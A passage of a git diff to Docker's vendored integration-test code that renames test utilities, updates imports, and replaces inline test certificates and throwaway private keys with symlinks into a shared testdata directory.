environment +func New() (*Execution, error) { + env, err := environment.New() + if err != nil { + return nil, err + } + + dockerBinary, err := exec.LookPath(DefaultClientBinary) + if err != nil { + return nil, err + } + + return &Execution{ + Execution: *env, + dockerBinary: dockerBinary, + }, nil +} diff --git a/vendor/github.com/docker/docker/integration-cli/events_utils.go b/vendor/github.com/docker/docker/integration-cli/events_utils_test.go similarity index 98% rename from vendor/github.com/docker/docker/integration-cli/events_utils.go rename to vendor/github.com/docker/docker/integration-cli/events_utils_test.go index ba241796b3..356b2c326d 100644 --- a/vendor/github.com/docker/docker/integration-cli/events_utils.go +++ b/vendor/github.com/docker/docker/integration-cli/events_utils_test.go @@ -9,10 +9,10 @@ import ( "strconv" "strings" - "github.com/Sirupsen/logrus" eventstestutils "github.com/docker/docker/daemon/events/testutils" - "github.com/docker/docker/pkg/integration/checker" + "github.com/docker/docker/integration-cli/checker" "github.com/go-check/check" + "github.com/sirupsen/logrus" ) // eventMatcher is a function that tries to match an event input. @@ -69,7 +69,7 @@ func (e *eventObserver) Start() error { // Stop stops the events command. func (e *eventObserver) Stop() { e.command.Process.Kill() - e.command.Process.Release() + e.command.Wait() } // Match tries to match the events output with a given matcher. diff --git a/vendor/github.com/docker/docker/integration-cli/fixtures.go b/vendor/github.com/docker/docker/integration-cli/fixtures.go deleted file mode 100644 index e99b738158..0000000000 --- a/vendor/github.com/docker/docker/integration-cli/fixtures.go +++ /dev/null @@ -1,69 +0,0 @@ -package main - -import ( - "fmt" - "io/ioutil" - "os" - "os/exec" - "path/filepath" - "sync" -) - -var ensureHTTPServerOnce sync.Once - -func ensureHTTPServerImage() error { - var doIt bool - ensureHTTPServerOnce.Do(func() { - doIt = true - }) - - if !doIt { - return nil - } - - protectedImages["httpserver:latest"] = struct{}{} - - tmp, err := ioutil.TempDir("", "docker-http-server-test") - if err != nil { - return fmt.Errorf("could not build http server: %v", err) - } - defer os.RemoveAll(tmp) - - goos := daemonPlatform - if goos == "" { - goos = "linux" - } - goarch := os.Getenv("DOCKER_ENGINE_GOARCH") - if goarch == "" { - goarch = "amd64" - } - - goCmd, lookErr := exec.LookPath("go") - if lookErr != nil { - return fmt.Errorf("could not build http server: %v", lookErr) - } - - cmd := exec.Command(goCmd, "build", "-o", filepath.Join(tmp, "httpserver"), "github.com/docker/docker/contrib/httpserver") - cmd.Env = append(os.Environ(), []string{ - "CGO_ENABLED=0", - "GOOS=" + goos, - "GOARCH=" + goarch, - }...) - var out []byte - if out, err = cmd.CombinedOutput(); err != nil { - return fmt.Errorf("could not build http server: %s", string(out)) - } - - cpCmd, lookErr := exec.LookPath("cp") - if lookErr != nil { - return fmt.Errorf("could not build http server: %v", lookErr) - } - if out, err = exec.Command(cpCmd, "../contrib/httpserver/Dockerfile", filepath.Join(tmp, "Dockerfile")).CombinedOutput(); err != nil { - return fmt.Errorf("could not build http server: %v", string(out)) - } - - if out, err = exec.Command(dockerBinary, "build", "-q", "-t", "httpserver", tmp).CombinedOutput(); err != nil { - return fmt.Errorf("could not build http server: %v", string(out)) - } - return nil -} diff --git a/vendor/github.com/docker/docker/integration-cli/fixtures/auth/docker-credential-shell-test b/vendor/github.com/docker/docker/integration-cli/fixtures/auth/docker-credential-shell-test index a7be56b2f2..97b3f1483e 100755 --- a/vendor/github.com/docker/docker/integration-cli/fixtures/auth/docker-credential-shell-test +++ b/vendor/github.com/docker/docker/integration-cli/fixtures/auth/docker-credential-shell-test @@ -1,4 +1,4 @@ -#!/bin/bash +#!/usr/bin/env bash set -e diff --git a/vendor/github.com/docker/docker/integration-cli/fixtures/deploy/default.yaml b/vendor/github.com/docker/docker/integration-cli/fixtures/deploy/default.yaml deleted file mode 100644 index f30c04f8f1..0000000000 --- a/vendor/github.com/docker/docker/integration-cli/fixtures/deploy/default.yaml +++ /dev/null @@ -1,9 +0,0 @@ - -version: "3" -services: - web: - image: busybox@sha256:e4f93f6ed15a0cdd342f5aae387886fba0ab98af0a102da6276eaf24d6e6ade0 - command: top - db: - image: busybox@sha256:e4f93f6ed15a0cdd342f5aae387886fba0ab98af0a102da6276eaf24d6e6ade0 - command: "tail -f /dev/null" diff --git a/vendor/github.com/docker/docker/integration-cli/fixtures/deploy/remove.yaml b/vendor/github.com/docker/docker/integration-cli/fixtures/deploy/remove.yaml deleted file mode 100644 index 4ec8cacc9b..0000000000 --- a/vendor/github.com/docker/docker/integration-cli/fixtures/deploy/remove.yaml +++ /dev/null @@ -1,11 +0,0 @@ - -version: "3.1" -services: - web: - image: busybox@sha256:e4f93f6ed15a0cdd342f5aae387886fba0ab98af0a102da6276eaf24d6e6ade0 - command: top - secrets: - - special -secrets: - special: - file: fixtures/secrets/default diff --git a/vendor/github.com/docker/docker/integration-cli/fixtures/deploy/secrets.yaml b/vendor/github.com/docker/docker/integration-cli/fixtures/deploy/secrets.yaml deleted file mode 100644 index 6ac92cddee..0000000000 --- a/vendor/github.com/docker/docker/integration-cli/fixtures/deploy/secrets.yaml +++ /dev/null @@ -1,20 +0,0 @@ - -version: "3.1" -services: - web: - image: busybox@sha256:e4f93f6ed15a0cdd342f5aae387886fba0ab98af0a102da6276eaf24d6e6ade0 - command: top - secrets: - - special - - source: super - target: foo.txt - mode: 0400 - - star -secrets: - special: - file: fixtures/secrets/default - super: - file: fixtures/secrets/default - star: - external: - name: outside diff --git a/vendor/github.com/docker/docker/integration-cli/fixtures/https/ca.pem b/vendor/github.com/docker/docker/integration-cli/fixtures/https/ca.pem deleted file mode 100644 index 6825d6d1bd..0000000000 --- a/vendor/github.com/docker/docker/integration-cli/fixtures/https/ca.pem +++ /dev/null @@ -1,23 +0,0 @@ ------BEGIN CERTIFICATE----- -MIID0TCCAzqgAwIBAgIJAP2r7GqEJwSnMA0GCSqGSIb3DQEBBQUAMIGiMQswCQYD -VQQGEwJVUzELMAkGA1UECBMCQ0ExFTATBgNVBAcTDFNhbkZyYW5jaXNjbzEVMBMG -A1UEChMMRm9ydC1GdW5zdG9uMREwDwYDVQQLEwhjaGFuZ2VtZTERMA8GA1UEAxMI -Y2hhbmdlbWUxETAPBgNVBCkTCGNoYW5nZW1lMR8wHQYJKoZIhvcNAQkBFhBtYWls -QGhvc3QuZG9tYWluMB4XDTEzMTIwMzE2NTYzMFoXDTIzMTIwMTE2NTYzMFowgaIx -CzAJBgNVBAYTAlVTMQswCQYDVQQIEwJDQTEVMBMGA1UEBxMMU2FuRnJhbmNpc2Nv -MRUwEwYDVQQKEwxGb3J0LUZ1bnN0b24xETAPBgNVBAsTCGNoYW5nZW1lMREwDwYD -VQQDEwhjaGFuZ2VtZTERMA8GA1UEKRMIY2hhbmdlbWUxHzAdBgkqhkiG9w0BCQEW -EG1haWxAaG9zdC5kb21haW4wgZ8wDQYJKoZIhvcNAQEBBQADgY0AMIGJAoGBALAn -0xDw+5y7ZptQacq66pUhRu82JP2WU6IDgo5QUtNU6/CX5PwQATe/OnYTZQFbksxp -AU9boG0FCkgxfsgPYXEuZxVEGKI2fxfKHOZZI8mrkWmj6eWU/0cvCjGVc9rTITP5 -sNQvg+hORyVDdNp2IdsbMJayiB3AQYMFx3vSDOMTAgMBAAGjggELMIIBBzAdBgNV -HQ4EFgQUZu7DFz09q0QBa2+ymRm9qgK1NPswgdcGA1UdIwSBzzCBzIAUZu7DFz09 -q0QBa2+ymRm9qgK1NPuhgaikgaUwgaIxCzAJBgNVBAYTAlVTMQswCQYDVQQIEwJD -QTEVMBMGA1UEBxMMU2FuRnJhbmNpc2NvMRUwEwYDVQQKEwxGb3J0LUZ1bnN0b24x -ETAPBgNVBAsTCGNoYW5nZW1lMREwDwYDVQQDEwhjaGFuZ2VtZTERMA8GA1UEKRMI -Y2hhbmdlbWUxHzAdBgkqhkiG9w0BCQEWEG1haWxAaG9zdC5kb21haW6CCQD9q+xq -hCcEpzAMBgNVHRMEBTADAQH/MA0GCSqGSIb3DQEBBQUAA4GBAF8fJKKM+/oOdnNi -zEd0M1+PmZOyqvjYQn/2ZR8UHH6Imgc/OPQKZXf0bVE1Txc/DaUNn9Isd1SuCuaE -ic3vAIYYU7PmgeNN6vwec48V96T7jr+GAi6AVMhQEc2hHCfVtx11Xx+x6aHDZzJt -Zxtf5lL6KSO9Y+EFwM+rju6hm5hW ------END CERTIFICATE----- diff --git a/vendor/github.com/docker/docker/integration-cli/fixtures/https/ca.pem b/vendor/github.com/docker/docker/integration-cli/fixtures/https/ca.pem new file mode 120000 index 0000000000..70a3e6ce54 --- /dev/null +++ b/vendor/github.com/docker/docker/integration-cli/fixtures/https/ca.pem @@ -0,0 +1 @@ +../../../integration/testdata/https/ca.pem \ No newline at end of file diff --git a/vendor/github.com/docker/docker/integration-cli/fixtures/https/client-cert.pem b/vendor/github.com/docker/docker/integration-cli/fixtures/https/client-cert.pem deleted file mode 100644 index c05ed47c2c..0000000000 --- a/vendor/github.com/docker/docker/integration-cli/fixtures/https/client-cert.pem +++ /dev/null @@ -1,73 +0,0 @@ -Certificate: - Data: - Version: 3 (0x2) - Serial Number: 3 (0x3) - Signature Algorithm: sha1WithRSAEncryption - Issuer: C=US, ST=CA, L=SanFrancisco, O=Fort-Funston, OU=changeme, CN=changeme/name=changeme/emailAddress=mail@host.domain - Validity - Not Before: Dec 4 14:17:54 2013 GMT - Not After : Dec 2 14:17:54 2023 GMT - Subject: C=US, ST=CA, L=SanFrancisco, O=Fort-Funston, OU=changeme, CN=client/name=changeme/emailAddress=mail@host.domain - Subject Public Key Info: - Public Key Algorithm: rsaEncryption - Public-Key: (1024 bit) - Modulus: - 00:ca:c9:05:d0:09:4e:3e:a4:fc:d5:14:f4:a5:e8: - 34:d3:6b:51:e3:f3:62:ea:a1:f0:e8:ed:c4:2a:bc: - f0:4f:ca:07:df:e3:88:fa:f4:21:99:35:0e:3d:ea: - b0:86:e7:c4:d2:8a:83:2b:42:b8:ec:a3:99:62:70: - 81:46:cc:fc:a5:1d:d2:63:e8:eb:07:25:9a:e2:25: - 6d:11:56:f2:1a:51:a1:b6:3e:1c:57:32:e9:7b:2c: - aa:1b:cc:97:2d:89:2d:b1:c9:5e:35:28:4d:7c:fa: - 65:31:3e:f7:70:dd:6e:0b:3c:58:af:a8:2e:24:c0: - 7e:4e:78:7d:0a:9e:8f:42:43 - Exponent: 65537 (0x10001) - X509v3 extensions: - X509v3 Basic Constraints: - CA:FALSE - Netscape Comment: - Easy-RSA Generated Certificate - X509v3 Subject Key Identifier: - DE:42:EF:2D:98:A3:6C:A8:AA:E0:8C:71:2C:9D:64:23:A9:E2:7E:81 - X509v3 Authority Key Identifier: - keyid:66:EE:C3:17:3D:3D:AB:44:01:6B:6F:B2:99:19:BD:AA:02:B5:34:FB - DirName:/C=US/ST=CA/L=SanFrancisco/O=Fort-Funston/OU=changeme/CN=changeme/name=changeme/emailAddress=mail@host.domain - serial:FD:AB:EC:6A:84:27:04:A7 - - X509v3 Extended Key Usage: - TLS Web Client Authentication - X509v3 Key Usage: - Digital Signature - Signature Algorithm: sha1WithRSAEncryption - 1c:44:26:ea:e1:66:25:cb:e4:8e:57:1c:f6:b9:17:22:62:40: - 12:90:8f:3b:b2:61:7a:54:94:8f:b1:20:0b:bf:a3:51:e3:fa: - 1c:a1:be:92:3a:d0:76:44:c0:57:83:ab:6a:e4:1a:45:49:a4: - af:39:0d:60:32:fc:3a:be:d7:fb:5d:99:7a:1f:87:e7:d5:ab: - 84:a2:5e:90:d8:bf:fa:89:6d:32:26:02:5e:31:35:68:7f:31: - f5:6b:51:46:bc:af:70:ed:5a:09:7d:ec:b2:48:4f:fe:c5:2f: - 56:04:ad:f6:c1:d2:2a:e4:6a:c4:87:fe:08:35:c5:38:cb:5e: - 4a:c4 ------BEGIN CERTIFICATE----- -MIIEFTCCA36gAwIBAgIBAzANBgkqhkiG9w0BAQUFADCBojELMAkGA1UEBhMCVVMx -CzAJBgNVBAgTAkNBMRUwEwYDVQQHEwxTYW5GcmFuY2lzY28xFTATBgNVBAoTDEZv -cnQtRnVuc3RvbjERMA8GA1UECxMIY2hhbmdlbWUxETAPBgNVBAMTCGNoYW5nZW1l -MREwDwYDVQQpEwhjaGFuZ2VtZTEfMB0GCSqGSIb3DQEJARYQbWFpbEBob3N0LmRv -bWFpbjAeFw0xMzEyMDQxNDE3NTRaFw0yMzEyMDIxNDE3NTRaMIGgMQswCQYDVQQG -EwJVUzELMAkGA1UECBMCQ0ExFTATBgNVBAcTDFNhbkZyYW5jaXNjbzEVMBMGA1UE -ChMMRm9ydC1GdW5zdG9uMREwDwYDVQQLEwhjaGFuZ2VtZTEPMA0GA1UEAxMGY2xp -ZW50MREwDwYDVQQpEwhjaGFuZ2VtZTEfMB0GCSqGSIb3DQEJARYQbWFpbEBob3N0 -LmRvbWFpbjCBnzANBgkqhkiG9w0BAQEFAAOBjQAwgYkCgYEAyskF0AlOPqT81RT0 -peg002tR4/Ni6qHw6O3EKrzwT8oH3+OI+vQhmTUOPeqwhufE0oqDK0K47KOZYnCB -Rsz8pR3SY+jrByWa4iVtEVbyGlGhtj4cVzLpeyyqG8yXLYktscleNShNfPplMT73 -cN1uCzxYr6guJMB+Tnh9Cp6PQkMCAwEAAaOCAVkwggFVMAkGA1UdEwQCMAAwLQYJ -YIZIAYb4QgENBCAWHkVhc3ktUlNBIEdlbmVyYXRlZCBDZXJ0aWZpY2F0ZTAdBgNV -HQ4EFgQU3kLvLZijbKiq4IxxLJ1kI6nifoEwgdcGA1UdIwSBzzCBzIAUZu7DFz09 -q0QBa2+ymRm9qgK1NPuhgaikgaUwgaIxCzAJBgNVBAYTAlVTMQswCQYDVQQIEwJD -QTEVMBMGA1UEBxMMU2FuRnJhbmNpc2NvMRUwEwYDVQQKEwxGb3J0LUZ1bnN0b24x -ETAPBgNVBAsTCGNoYW5nZW1lMREwDwYDVQQDEwhjaGFuZ2VtZTERMA8GA1UEKRMI -Y2hhbmdlbWUxHzAdBgkqhkiG9w0BCQEWEG1haWxAaG9zdC5kb21haW6CCQD9q+xq -hCcEpzATBgNVHSUEDDAKBggrBgEFBQcDAjALBgNVHQ8EBAMCB4AwDQYJKoZIhvcN -AQEFBQADgYEAHEQm6uFmJcvkjlcc9rkXImJAEpCPO7JhelSUj7EgC7+jUeP6HKG+ -kjrQdkTAV4OrauQaRUmkrzkNYDL8Or7X+12Zeh+H59WrhKJekNi/+oltMiYCXjE1 -aH8x9WtRRryvcO1aCX3sskhP/sUvVgSt9sHSKuRqxIf+CDXFOMteSsQ= ------END CERTIFICATE----- diff --git a/vendor/github.com/docker/docker/integration-cli/fixtures/https/client-cert.pem b/vendor/github.com/docker/docker/integration-cli/fixtures/https/client-cert.pem new file mode 120000 index 0000000000..458882026e --- /dev/null +++ b/vendor/github.com/docker/docker/integration-cli/fixtures/https/client-cert.pem @@ -0,0 +1 @@ +../../../integration/testdata/https/client-cert.pem \ No newline at end of file diff --git a/vendor/github.com/docker/docker/integration-cli/fixtures/https/client-key.pem b/vendor/github.com/docker/docker/integration-cli/fixtures/https/client-key.pem deleted file mode 100644 index b5c15f8dc7..0000000000 --- a/vendor/github.com/docker/docker/integration-cli/fixtures/https/client-key.pem +++ /dev/null @@ -1,16 +0,0 @@ ------BEGIN PRIVATE KEY----- -MIICdQIBADANBgkqhkiG9w0BAQEFAASCAl8wggJbAgEAAoGBAMrJBdAJTj6k/NUU -9KXoNNNrUePzYuqh8OjtxCq88E/KB9/jiPr0IZk1Dj3qsIbnxNKKgytCuOyjmWJw -gUbM/KUd0mPo6wclmuIlbRFW8hpRobY+HFcy6XssqhvMly2JLbHJXjUoTXz6ZTE+ -93Ddbgs8WK+oLiTAfk54fQqej0JDAgMBAAECgYBOFEzKp2qbMEexe9ofL2N3rDDh -xkrl8OijpzkLA6i78BxMFn4dsnZlWUpciMrjhsYAExkiRRSS+QMMJimAq1jzQqc3 -FAQV2XGYwkd0cUn7iZGvfNnEPysjsfyYQM+m+sT0ATj4BZjVShC6kkSjTdm1leLN -OSvcHdcu3Xxg9ufF0QJBAPYdnNt5sIndt2WECePuRVi+uF4mlxTobFY0fjn26yhC -4RsnhhD3Vldygo9gvnkwrAZYaALGSPBewes2InxvjA8CQQDS7erKiNXpwoqz5XiU -SVEsIIVTdWzBjGbIqMOu/hUwM5FK4j6JTBks0aTGMyh0YV9L1EzM0X79J29JahCe -iQKNAkBKNMOGqTpBV0hko1sYDk96YobUXG5RL4L6uvkUIQ7mJMQam+AgXXL7Ctuy -v0iu4a38e8tgisiTMP7nHHtpaXihAkAOiN54/lzfMsykANgCP9scE1GcoqbP34Dl -qttxH4kOPT9xzY1JoLjLYdbc4YGUI3GRpBt2sajygNkmUey7P+2xAkBBsVCZFvTw -qHvOpPS2kX5ml5xoc/QAHK9N7kR+X7XFYx82RTVSqJEK4lPb+aEWn+CjiIewO4Q5 -ksDFuNxAzbhl ------END PRIVATE KEY----- diff --git a/vendor/github.com/docker/docker/integration-cli/fixtures/https/client-key.pem b/vendor/github.com/docker/docker/integration-cli/fixtures/https/client-key.pem new file mode 120000 index 0000000000..d5f6bbee57 --- /dev/null +++ b/vendor/github.com/docker/docker/integration-cli/fixtures/https/client-key.pem @@ -0,0 +1 @@ +../../../integration/testdata/https/client-key.pem \ No newline at end of file diff --git a/vendor/github.com/docker/docker/integration-cli/fixtures/https/server-cert.pem b/vendor/github.com/docker/docker/integration-cli/fixtures/https/server-cert.pem deleted file mode 100644 index 08abfd1a3b..0000000000 --- a/vendor/github.com/docker/docker/integration-cli/fixtures/https/server-cert.pem +++ /dev/null @@ -1,76 +0,0 @@ -Certificate: - Data: - Version: 3 (0x2) - Serial Number: 4 (0x4) - Signature Algorithm: sha1WithRSAEncryption - Issuer: C=US, ST=CA, L=SanFrancisco, O=Fort-Funston, OU=changeme, CN=changeme/name=changeme/emailAddress=mail@host.domain - Validity - Not Before: Dec 4 15:01:20 2013 GMT - Not After : Dec 2 15:01:20 2023 GMT - Subject: C=US, ST=CA, L=SanFrancisco, O=Fort-Funston, OU=changeme, CN=*/name=changeme/emailAddress=mail@host.domain - Subject Public Key Info: - Public Key Algorithm: rsaEncryption - Public-Key: (1024 bit) - Modulus: - 00:c1:ff:7d:30:6f:64:4a:b1:92:b1:71:d1:c1:74: - e2:1d:db:2d:11:24:e1:00:d4:00:ae:6f:c8:9e:ae: - 67:b3:4a:bd:f7:e6:9e:57:6d:19:4c:3c:23:94:2d: - 3d:d6:63:84:d8:fa:76:2b:38:12:c1:ed:20:9d:32: - e0:e8:c2:bf:9a:77:70:04:3f:7f:ca:8c:2c:82:d6: - 3d:25:5c:02:1a:4f:64:93:03:dd:9c:42:97:5e:09: - 49:af:f0:c2:e1:30:08:0e:21:46:95:d1:13:59:c0: - c8:76:be:94:0d:8b:43:67:21:33:b2:08:60:9d:76: - a8:05:32:1e:f9:95:09:14:75 - Exponent: 65537 (0x10001) - X509v3 extensions: - X509v3 Basic Constraints: - CA:FALSE - Netscape Cert Type: - SSL Server - Netscape Comment: - Easy-RSA Generated Server Certificate - X509v3 Subject Key Identifier: - 14:02:FD:FD:DD:13:38:E0:71:EA:D1:BE:C0:0E:89:1A:2D:B6:19:06 - X509v3 Authority Key Identifier: - keyid:66:EE:C3:17:3D:3D:AB:44:01:6B:6F:B2:99:19:BD:AA:02:B5:34:FB - DirName:/C=US/ST=CA/L=SanFrancisco/O=Fort-Funston/OU=changeme/CN=changeme/name=changeme/emailAddress=mail@host.domain - serial:FD:AB:EC:6A:84:27:04:A7 - - X509v3 Extended Key Usage: - TLS Web Server Authentication - X509v3 Key Usage: - Digital Signature, Key Encipherment - Signature Algorithm: sha1WithRSAEncryption - 40:0f:10:39:c4:b7:0f:0d:2f:bf:d2:16:cc:8e:d3:9a:fb:8b: - ce:4b:7b:0d:48:77:ce:f1:fe:d5:8f:ea:b1:71:ed:49:1d:9f: - 23:3a:16:d4:70:7c:c5:29:bf:e4:90:34:d0:f0:00:24:f4:e4: - df:2c:c3:83:01:66:61:c9:a8:ab:29:e7:98:6d:27:89:4a:76: - c9:2e:19:8e:fe:6e:d5:f8:99:11:0e:97:67:4b:34:e3:1e:e3: - 9f:35:00:a5:32:f9:b5:2c:f2:e0:c5:2e:cc:81:bd:18:dd:5c: - 12:c8:6b:fa:0c:17:74:30:55:f6:6e:20:9a:6c:1e:09:b4:0c: - 15:42 ------BEGIN CERTIFICATE----- -MIIEKjCCA5OgAwIBAgIBBDANBgkqhkiG9w0BAQUFADCBojELMAkGA1UEBhMCVVMx -CzAJBgNVBAgTAkNBMRUwEwYDVQQHEwxTYW5GcmFuY2lzY28xFTATBgNVBAoTDEZv -cnQtRnVuc3RvbjERMA8GA1UECxMIY2hhbmdlbWUxETAPBgNVBAMTCGNoYW5nZW1l -MREwDwYDVQQpEwhjaGFuZ2VtZTEfMB0GCSqGSIb3DQEJARYQbWFpbEBob3N0LmRv -bWFpbjAeFw0xMzEyMDQxNTAxMjBaFw0yMzEyMDIxNTAxMjBaMIGbMQswCQYDVQQG -EwJVUzELMAkGA1UECBMCQ0ExFTATBgNVBAcTDFNhbkZyYW5jaXNjbzEVMBMGA1UE -ChMMRm9ydC1GdW5zdG9uMREwDwYDVQQLEwhjaGFuZ2VtZTEKMAgGA1UEAxQBKjER -MA8GA1UEKRMIY2hhbmdlbWUxHzAdBgkqhkiG9w0BCQEWEG1haWxAaG9zdC5kb21h -aW4wgZ8wDQYJKoZIhvcNAQEBBQADgY0AMIGJAoGBAMH/fTBvZEqxkrFx0cF04h3b -LREk4QDUAK5vyJ6uZ7NKvffmnldtGUw8I5QtPdZjhNj6dis4EsHtIJ0y4OjCv5p3 -cAQ/f8qMLILWPSVcAhpPZJMD3ZxCl14JSa/wwuEwCA4hRpXRE1nAyHa+lA2LQ2ch -M7IIYJ12qAUyHvmVCRR1AgMBAAGjggFzMIIBbzAJBgNVHRMEAjAAMBEGCWCGSAGG -+EIBAQQEAwIGQDA0BglghkgBhvhCAQ0EJxYlRWFzeS1SU0EgR2VuZXJhdGVkIFNl -cnZlciBDZXJ0aWZpY2F0ZTAdBgNVHQ4EFgQUFAL9/d0TOOBx6tG+wA6JGi22GQYw -gdcGA1UdIwSBzzCBzIAUZu7DFz09q0QBa2+ymRm9qgK1NPuhgaikgaUwgaIxCzAJ -BgNVBAYTAlVTMQswCQYDVQQIEwJDQTEVMBMGA1UEBxMMU2FuRnJhbmNpc2NvMRUw -EwYDVQQKEwxGb3J0LUZ1bnN0b24xETAPBgNVBAsTCGNoYW5nZW1lMREwDwYDVQQD -EwhjaGFuZ2VtZTERMA8GA1UEKRMIY2hhbmdlbWUxHzAdBgkqhkiG9w0BCQEWEG1h -aWxAaG9zdC5kb21haW6CCQD9q+xqhCcEpzATBgNVHSUEDDAKBggrBgEFBQcDATAL -BgNVHQ8EBAMCBaAwDQYJKoZIhvcNAQEFBQADgYEAQA8QOcS3Dw0vv9IWzI7TmvuL -zkt7DUh3zvH+1Y/qsXHtSR2fIzoW1HB8xSm/5JA00PAAJPTk3yzDgwFmYcmoqynn -mG0niUp2yS4Zjv5u1fiZEQ6XZ0s04x7jnzUApTL5tSzy4MUuzIG9GN1cEshr+gwX -dDBV9m4gmmweCbQMFUI= ------END CERTIFICATE----- diff --git a/vendor/github.com/docker/docker/integration-cli/fixtures/https/server-cert.pem b/vendor/github.com/docker/docker/integration-cli/fixtures/https/server-cert.pem new file mode 120000 index 0000000000..c18601067a --- /dev/null +++ b/vendor/github.com/docker/docker/integration-cli/fixtures/https/server-cert.pem @@ -0,0 +1 @@ +../../../integration/testdata/https/server-cert.pem \ No newline at end of file diff --git a/vendor/github.com/docker/docker/integration-cli/fixtures/https/server-key.pem b/vendor/github.com/docker/docker/integration-cli/fixtures/https/server-key.pem deleted file mode 100644 index c269320ef0..0000000000 --- a/vendor/github.com/docker/docker/integration-cli/fixtures/https/server-key.pem +++ /dev/null @@ -1,16 +0,0 @@ ------BEGIN PRIVATE KEY----- -MIICeAIBADANBgkqhkiG9w0BAQEFAASCAmIwggJeAgEAAoGBAMH/fTBvZEqxkrFx -0cF04h3bLREk4QDUAK5vyJ6uZ7NKvffmnldtGUw8I5QtPdZjhNj6dis4EsHtIJ0y -4OjCv5p3cAQ/f8qMLILWPSVcAhpPZJMD3ZxCl14JSa/wwuEwCA4hRpXRE1nAyHa+ -lA2LQ2chM7IIYJ12qAUyHvmVCRR1AgMBAAECgYAmwckb9RUfSwyYgLm8IYLPHiuJ -wkllZfVg5Bo7gXJcQnFjZmJ56uTj8xvUjZlODIHM63TSO5ibv6kFXtXKCqZGd2M+ -wGbhZ0f+2GvKcwMmJERnIQjuoNaYSQLT0tM0VB9Iz0rJlZC+tzPZ+5pPqEumRdsS -IzWNXfF42AhcbwAQYQJBAPVXtMYIJc9EZsz86ZcQiMPWUpCX5vnRmtwL8kKyR8D5 -4KfYeiowyFffSRMMcclwNHq7TgSXN+nIXM9WyzyzwikCQQDKbNA28AgZp9aT54HP -WnbeE2pmt+uk/zl/BtxJSoK6H+69Jec+lf7EgL7HgOWYRSNot4uQWu8IhsHLTiUq -+0FtAkEAqwlRxRy4/x24bP+D+QRV0/D97j93joFJbE4Hved7jlSlAV4xDGilwlyv -HNB4Iu5OJ6Gcaibhm+FKkmD3noHSwQJBAIpu3fokLzX0bS+bDFBU6qO3HXX/47xj -+tsfQvkwZrSI8AkU6c8IX0HdVhsz0FBRQAT2ORDQz1XCarfxykNZrwUCQQCGCBIc -BBCWzhHlswlGidWJg3HqqO6hPPClEr3B5G87oCsdeYwiO23XT6rUnoJXfJHp6oCW -5nCwDu5ZTP+khltg ------END PRIVATE KEY----- diff --git a/vendor/github.com/docker/docker/integration-cli/fixtures/https/server-key.pem b/vendor/github.com/docker/docker/integration-cli/fixtures/https/server-key.pem new file mode 120000 index 0000000000..48b9c2df65 --- /dev/null +++ b/vendor/github.com/docker/docker/integration-cli/fixtures/https/server-key.pem @@ -0,0 +1 @@ +../../../integration/testdata/https/server-key.pem \ No newline at end of file diff --git a/vendor/github.com/docker/docker/integration-cli/fixtures/notary/delgkey1.crt b/vendor/github.com/docker/docker/integration-cli/fixtures/notary/delgkey1.crt deleted file mode 100644 index 2218f23c89..0000000000 --- a/vendor/github.com/docker/docker/integration-cli/fixtures/notary/delgkey1.crt +++ /dev/null @@ -1,21 +0,0 @@ ------BEGIN CERTIFICATE----- -MIIDhTCCAm2gAwIBAgIJAP2EcMN2UXPcMA0GCSqGSIb3DQEBCwUAMFcxCzAJBgNV -BAYTAlVTMQswCQYDVQQIEwJDQTEVMBMGA1UEBxMMU2FuRnJhbmNpc2NvMQ8wDQYD -VQQKEwZEb2NrZXIxEzARBgNVBAMTCmRlbGVnYXRpb24wHhcNMTYwOTI4MTc0ODQ4 -WhcNMjYwNjI4MTc0ODQ4WjBXMQswCQYDVQQGEwJVUzELMAkGA1UECBMCQ0ExFTAT -BgNVBAcTDFNhbkZyYW5jaXNjbzEPMA0GA1UEChMGRG9ja2VyMRMwEQYDVQQDEwpk -ZWxlZ2F0aW9uMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAvgewhaYs -Ke5s2AM7xxKrT4A6n7hW17qSnBjonCcPcwTFmYqIOdxWjYITgJuHrTwB4ZhBqWS7 -tTsUUu6hWLMeB7Uo5/GEQAAZspKkT9G/rNKF9lbWK9PPhGGkeR01c/Q932m92Hsn -fCQ0Pp/OzD3nVTh0v9HKk+PObNMOCcqG87eYs4ylPRxs0RrE/rP+bEGssKQSbeCZ -wazDnO+kiatVgKQZ2CK23iFdRE1z2rzqVDeaFWdvBqrRdWnkOZClhlLgEQ5nK2yV -B6tSqOiI3MmHyHzIkGOQJp2/s7Pe0ckEkzsjTsJW8oKHlBBl6pRxHIKzNN4VFbeB -vvYvrogrDrC/owIDAQABo1QwUjAMBgNVHRMBAf8EAjAAMA4GA1UdDwEB/wQEAwIF -oDATBgNVHSUEDDAKBggrBgEFBQcDAzAdBgNVHQ4EFgQUFoHfukRa6qGk1ncON64Z -ASKlZdkwDQYJKoZIhvcNAQELBQADggEBAEq9Adpd03CPmpbRtTAJGAkjjLFr60sV -2r+/l/m9R31ZCN9ymM9nxToQ8zfMdeAh/nnPcErziil2gDVqXueCNDkRj09tmDIE -Q1Oc92uyNZNgcECow77cKZCTZSTku+qsJrYaykH5vSnia8ltcKj8inJedIcpBR+p -608HEQvF0Eg5eaLPJwH48BCb0Gqdri1dJgrNnqptz7MDr8M+u7tHVulbAd3YxLlq -JH1W2bkVUx6esbn/MUE5HL5iTuOYREEINvBSmLdmmFkampmCnCB/bDEyJeL9bAkt -ZPIi0UNSnqFKLSP1Vf8AGLXt6iO7+1OGvtsDXEEYdXVOMsSXZtUuT7A= ------END CERTIFICATE----- diff --git a/vendor/github.com/docker/docker/integration-cli/fixtures/notary/delgkey1.key b/vendor/github.com/docker/docker/integration-cli/fixtures/notary/delgkey1.key deleted file mode 100644 index cb37efc94a..0000000000 --- a/vendor/github.com/docker/docker/integration-cli/fixtures/notary/delgkey1.key +++ /dev/null @@ -1,27 +0,0 @@ ------BEGIN RSA PRIVATE KEY----- -MIIEpAIBAAKCAQEAvgewhaYsKe5s2AM7xxKrT4A6n7hW17qSnBjonCcPcwTFmYqI -OdxWjYITgJuHrTwB4ZhBqWS7tTsUUu6hWLMeB7Uo5/GEQAAZspKkT9G/rNKF9lbW -K9PPhGGkeR01c/Q932m92HsnfCQ0Pp/OzD3nVTh0v9HKk+PObNMOCcqG87eYs4yl -PRxs0RrE/rP+bEGssKQSbeCZwazDnO+kiatVgKQZ2CK23iFdRE1z2rzqVDeaFWdv -BqrRdWnkOZClhlLgEQ5nK2yVB6tSqOiI3MmHyHzIkGOQJp2/s7Pe0ckEkzsjTsJW 